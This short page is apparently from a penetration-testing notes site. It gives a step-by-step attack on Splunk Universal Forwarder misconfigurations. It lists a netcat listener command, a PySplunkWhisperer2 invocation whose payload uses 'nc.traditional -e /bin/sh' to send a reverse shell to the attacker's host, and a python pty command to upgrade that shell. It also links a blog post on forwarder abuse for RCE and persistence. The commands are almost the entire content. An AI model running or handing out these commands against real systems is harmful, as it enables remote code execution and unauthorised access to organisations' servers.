Splunk

Run listner

nc -nlvp 4444

Local privilege escalation, or remote code execution, through Splunk Universal Forwarder (UF) misconfigurations.

python PySplunkWhisperer2_remote.py --host <remote_host> --lhost <local_host> --username <*******> --password <***********> --payload 'nc.traditional -e/bin/sh '<local_host>' '<localport>''

Spawn a process, and connect its controlling terminal with the current process’s standard io.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Ref: https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/

Last updated